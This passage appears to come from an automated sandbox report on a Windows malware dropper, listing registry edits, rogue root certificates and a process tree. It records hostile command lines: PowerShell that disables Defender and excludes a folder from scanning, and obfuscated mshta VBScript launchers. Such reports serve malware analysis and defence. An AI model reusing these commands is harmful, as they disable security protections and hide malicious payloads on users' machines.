| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15a8461882.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun154ca5fada.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15168f90478cc7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15591a43f8a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15b94526a807b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1500b8e65c1f53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15132bf2c585337a0.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe
Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun150e9a93676ff.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe
Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15c4c762b69ba5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1524d92394d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156aa32cae4a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15372e8db79ed3d.exe
Sun15372e8db79ed3d.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe
Sun1500b8e65c1f53.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15591a43f8a.exe
Sun15591a43f8a.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun154ca5fada.exe
Sun154ca5fada.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe
Sun1524d92394d.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1580e9cd8c23e.exe
Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1515dbfc0edab0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1585e1028b0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156d9ca8467.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15168f90478cc7.exe
Sun15168f90478cc7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 264
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe
Sun1507dd11d509.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if """"== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15e81af69f990d3a6.exe
Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe
Sun1585e1028b0.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe" -u
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun150e9a93676ff.exe
Sun150e9a93676ff.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe
Sun15a8461882.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15c4c762b69ba5.exe
Sun15c4c762b69ba5.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15132bf2c585337a0.exe
Sun15132bf2c585337a0.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe
Sun15b94526a807b.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 264
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe
Sun156aa32cae4a.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1515dbfc0edab0.exe
Sun1515dbfc0edab0.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe
Sun156d9ca8467.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Users\Admin\AppData\Local\Temp\is-L27RA.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L27RA.tmp\Sun15b94526a807b.tmp" /SL5="$601D4,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-KHILQ.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KHILQ.tmp\Sun15b94526a807b.tmp" /SL5="$10240,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\cmd.exe
